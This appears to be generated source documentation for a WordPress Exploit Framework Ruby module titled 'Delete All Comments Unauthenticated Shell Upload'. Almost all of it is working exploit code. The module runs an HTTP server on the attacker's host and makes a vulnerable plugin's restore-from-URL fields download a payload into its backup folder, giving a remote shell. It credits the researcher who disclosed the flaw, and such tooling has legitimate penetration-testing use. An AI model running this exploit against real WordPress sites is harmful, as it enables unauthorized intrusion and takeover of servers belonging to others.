class Wpxf::Exploit::DeleteAllCommentsShellUpload

Public Class Methods

new() click to toggle source
Calls superclass method Wpxf::Net::HttpServer::new
# File lib/wpxf/modules/exploit/shell/delete_all_comments_shell_upload.rb, line 7
def initialize
  super

  update_info(
    name: 'Delete All Comments Unauthenticated Shell Upload',
    author: [
      'NinTechNet', # Discovery and disclosure
      'rastating'   # WPXF module
    ],
    references: [
      ['WPVDB', '8694'],
      ['URL', 'http://blog.nintechnet.com/arbitrary-file-upload-vulnerability-in-wordpress-delete-all-comments-plugin/']
    ],
    date: 'Dec 10 2016'
  )

  register_options([
    StringOption.new(
      name: 'http_server_host',
      desc: 'The external address of the host running this module',
      required: true
    )
  ])
end

Public Instance Methods

check() click to toggle source
# File lib/wpxf/modules/exploit/shell/delete_all_comments_shell_upload.rb, line 32
def check
  check_plugin_version_from_readme('delete-all-comments')
end
download_url() click to toggle source
# File lib/wpxf/modules/exploit/shell/delete_all_comments_shell_upload.rb, line 40
def download_url
  "http://#{datastore['http_server_host']}:#{http_server_bind_port}/#{Utility::Text.rand_alpha(8)}/#{payload_name}"
end
on_http_request(_path, _params, _headers) click to toggle source
# File lib/wpxf/modules/exploit/shell/delete_all_comments_shell_upload.rb, line 55
def on_http_request(_path, _params, _headers)
  payload.encoded
end
payload_body_builder() click to toggle source
# File lib/wpxf/modules/exploit/shell/delete_all_comments_shell_upload.rb, line 44
def payload_body_builder
  builder = Utility::BodyBuilder.new
  builder.add_field('restorefromfileURL', download_url)
  builder.add_field('restorefromfileNAME', payload_name)
  builder
end
run() click to toggle source
Calls superclass method Wpxf::WordPress::ShellUpload#run
# File lib/wpxf/modules/exploit/shell/delete_all_comments_shell_upload.rb, line 59
def run
  start_http_server(true)
  success = super
  stop_http_server
  success
end
uploaded_payload_location() click to toggle source
# File lib/wpxf/modules/exploit/shell/delete_all_comments_shell_upload.rb, line 51
def uploaded_payload_location
  normalize_uri(wordpress_url_plugins, 'delete-all-comments', 'backup', payload_name)
end
uploader_url() click to toggle source
# File lib/wpxf/modules/exploit/shell/delete_all_comments_shell_upload.rb, line 36
def uploader_url
  normalize_uri(wordpress_url_plugins, 'delete-all-comments', 'delete-all-comments.php')
end